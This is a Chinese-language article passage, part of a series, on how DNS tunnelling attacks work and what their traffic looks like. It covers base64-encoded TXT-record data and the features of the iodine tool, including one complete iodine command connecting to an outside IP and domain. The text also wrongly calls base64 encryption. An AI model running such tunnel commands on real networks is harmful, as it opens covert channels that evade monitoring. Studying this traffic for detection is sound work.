dns隧道攻击原理及常用工具流量分析 (18)

图片

总结:

client通过TXT类型记录的域名前缀来发出数据,采用的是base64加密的方式。

从发包行为上可以发现,在进行传输数据这种大量数据交互操作的情况

2、iodine

与同类工具相比,iodine具有以下特点:

下行流量不编码(下行流量是指流出服务器的流量,s to c)

强制密码

支持同一网段之间的隧道

支持多种dns记录格式

Iodine默认使用TXT和NULL类型发送数据,支持NULL,TXT,SRV,MX,CNAME,A等多种查询请求类型。 iodine -fP passwd 96.45.188.252 dnsns.hackbiji.top

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zwwggg.html